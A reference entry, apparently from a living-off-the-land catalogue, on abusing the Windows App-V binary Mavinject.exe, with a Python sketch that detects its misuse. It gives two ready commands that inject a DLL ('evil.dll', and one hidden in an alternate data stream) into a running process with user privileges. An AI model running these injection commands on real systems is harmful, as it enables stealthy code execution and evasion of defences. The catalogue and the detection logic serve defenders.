Mavinject.exe

Used by App-V in Windows


Paths:


Resources:
https://twitter.com/gN3mes1s/status/941315826107510784
https://twitter.com/Hexcorn/status/776122138063409152
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

Acknowledgement:
Giuseppe N3mes1s - @gN3mes1s
Oddvar Moe - @oddvarmoe


Detection:
Mavinject.exe should not run unless App-V is in use on the workstation.



Execute

Inject evil.dll into a process with PID 3110.
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Usecase: Inject DLL file into a running process
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1218



Alternate data streams

Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Usecase: Inject DLL file into a running process
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre: T1096
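
Detection example (added here, not part of the original entry): a Python sketch that applies the detection note above to process-creation records and also flags the /INJECTRUNNING and ADS command lines shown on this page. The record field names, host names, the App-V host allowlist and the third sample path are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records; field names and hosts are assumptions.
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\mavinject.exe",
     "cmdline": r"MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll"},
    {"host": "WS-02", "image": r"C:\Windows\System32\mavinject.exe",
     "cmdline": r'Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"'},
    {"host": "APPV-07", "image": r"C:\Windows\System32\mavinject.exe",
     "cmdline": r"mavinject.exe 812 /INJECTRUNNING c:\constructed\pkg.dll"},
    {"host": "WS-01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe c:\notes\mavinject.txt"},
]

PID_RE = re.compile(r'mavinject\.exe"?\s+(\d+)', re.IGNORECASE)
DLL_RE = re.compile(r'/INJECTRUNNING\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

def has_ads(path):
    """True if the path names a stream (a colon beyond the drive letter)."""
    rest = path[2:] if re.match(r"[A-Za-z]:", path) else path
    return ":" in rest

def analyze(event, appv_hosts=frozenset()):
    """Return a finding dict for a suspicious mavinject.exe run, else None."""
    if basename(event["image"]).lower() != "mavinject.exe":
        return None
    reasons = []
    if event["host"] not in appv_hosts:
        reasons.append("no_appv")  # the entry's rule: no App-V, no mavinject
    finding = {"host": event["host"], "pid": None, "dll": None, "reasons": reasons}
    dll = DLL_RE.search(event["cmdline"])
    if dll:
        pid = PID_RE.search(event["cmdline"])
        finding["pid"] = int(pid.group(1)) if pid else None
        finding["dll"] = dll.group(1) or dll.group(2)
        reasons.append("dll_injection")
        if has_ads(finding["dll"]):
            reasons.append("ads_path")  # DLL read from an alternate data stream
    return finding if reasons else None

def scan(events, appv_hosts=frozenset()):
    """Analyze every record and keep only those that produced a finding."""
    return [f for e in events if (f := analyze(e, appv_hosts))]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, appv_hosts={"APPV-07"}):
        print(f)
```

The check matches on the image file name, so it does not cover a copy of the binary saved under another name.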